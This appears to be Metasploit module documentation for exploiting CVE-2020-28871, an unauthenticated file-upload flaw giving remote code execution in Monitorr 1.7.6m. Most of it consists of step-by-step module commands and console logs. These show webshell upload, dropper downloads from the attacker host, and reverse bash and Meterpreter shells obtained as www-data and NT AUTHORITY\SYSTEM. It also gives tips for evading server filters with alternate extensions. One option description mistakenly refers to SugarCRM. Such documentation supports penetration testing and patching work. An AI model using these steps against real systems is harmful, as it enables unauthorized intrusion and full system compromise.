## Vulnerable Application

This module exploits an arbitrary file upload vulnerability (CVE-2020-28871) that results into an RCE in Monitorr,
a web application that allows you to setup a dashboard to monitor various web site/web application up or down state.
All versions including `v1.7.6m` and latest development release `v1.7.7d` are vulnerable and no patch is available.

The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with
embedded PHP code to the `assets/data/usrimg` (Linux) or `assets\data\usrimg` (Windows) directory on the web server
using the vulnerable endpoint `/assets/php/upload.php`. Once uploaded to the server, depending on server configuration,
the attacker can access the malicious `GIF` file via HTTP or HTTPS, thereby executing the malicious PHP code and
gaining access to the system.

This vulnerability does not require authentication and any remote attacker can exploit this vulnerability to gain
access to the underlying operating system as the user under which the web services are running (typically `www-data`).

Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable Monitorr software loaded.
Follow instructions [Monitorr Install](https://github.com/Monitorr/Monitorr/wiki/01-Config:--Initial-configuration),
to install the Monitorr application either on Linux or Windows.

This module has been tested against a Monitorr installation with the specifications listed below:

* Monitorr
* Version: `1.7.6m`
* Linux OS: Ubuntu 22.04
* Windows OS: Windows Data Center 2019

## Verification Steps

1. `use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871`
1. `set RHOSTS <TARGET HOSTS>`
1. `set RPORT <port>`
1. `set LHOST <attacker host ip>`
1. `set LPORT <attacker host port>`
1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper, 3-Windows command, or 4-Windows Dropper>`
1. `exploit`
1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.

## Options

### WEBSHELL
You can use this option to set the filename and extension of the webshell.
This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
to bypass any security settings on the Web and PHP server.

### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.

## Scenarios

### Monitorr 1.7.6m on Ubuntu Linux 22.04 - PHP Meterpreter session
```
msf > use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871
[*] Using configured payload php/meterpreter/reverse_tcp
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > options
Module options (exploit/multi/http/monitorr_webshell_rce_cve_2020_28871):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       SugarCRM base url
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
                                         name will be randomly generated if left unset.
   When TARGET is not 0:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
                                        0.0.0.0 to listen on all addresses.
   SRVPORT  1981             yes       The local port to listen on.
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   PHP
View the full module info with the info, or info -d command.
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lport 4444
lport => 4444
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 0
target => 0
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted tsrezgkjwmtxyj.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.34:54680) at 2023-03-13 16:14:32 +0000

meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```

### Monitorr 1.7.6m on Ubuntu Linux 22.04 - bash reverse shell
```
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 1
target => 1
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted jzcjawsk.php
[*] Command shell session 2 opened (192.168.201.10:4444 -> 192.168.201.34:58348) at 2023-03-13 16:16:06 +0000

uname -a
Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

### Monitorr 1.7.6m on Ubuntu Linux 22.04 - Linux Dropper Meterpreter session
```
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 2
target => 2
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/nAtmJo
[*] Client 192.168.201.34 (Wget/1.21.2) requested /nAtmJo
[*] Sending payload to 192.168.201.34 (Wget/1.21.2)
[*] Sending stage (3045348 bytes) to 192.168.201.34
[+] Deleted ebdzghdq.php
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.34:32922) at 2023-03-13 16:17:05 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.34
OS           : Ubuntu 22.04 (Linux 5.15.0-60-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```

### Monitorr 1.7.6m on Windows Data Center 2019 - Powershell Meterpreter session
```
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.36
rhosts => 192.168.201.36
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
[+] 192.168.201.36:80 - The target is vulnerable. Monitorr version: 1.7.6m
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 3
target => 3
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
[*] Sending stage (175686 bytes) to 192.168.201.36
[+] Deleted dkvszuqil.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.36:54805) at 2023-03-13 16:18:53 +0000

meterpreter > sysinfo
Computer        : WIN-HHRQENPDSRS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

### Monitorr 1.7.6m on Windows Data Center 2019 - Windows Dropper Meterpreter session
```
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 4
target => 4
msf exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/EEFxVaRHZLJZNrF
[*] Client 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /EEFxVaRHZLJZNrF
[*] Sending payload to 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.36
[+] Deleted zyrkwyinvjnzr.php
[*] Meterpreter session 5 opened (192.168.201.10:4444 -> 192.168.201.36:54882) at 2023-03-13 16:19:52 +0000
[*] Command Stager progress - 100.00% done (155/155 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-HHRQENPDSRS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## Limitations
No limitations identified.
